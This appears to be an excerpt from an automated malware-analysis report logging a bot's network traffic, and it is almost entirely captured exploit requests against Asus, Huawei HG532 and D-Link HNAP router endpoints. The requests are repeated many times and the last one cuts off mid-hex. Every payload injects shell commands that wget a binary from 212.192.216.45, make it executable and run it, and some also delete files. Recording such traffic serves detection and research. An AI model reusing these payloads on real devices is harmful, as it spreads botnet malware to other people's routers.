| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 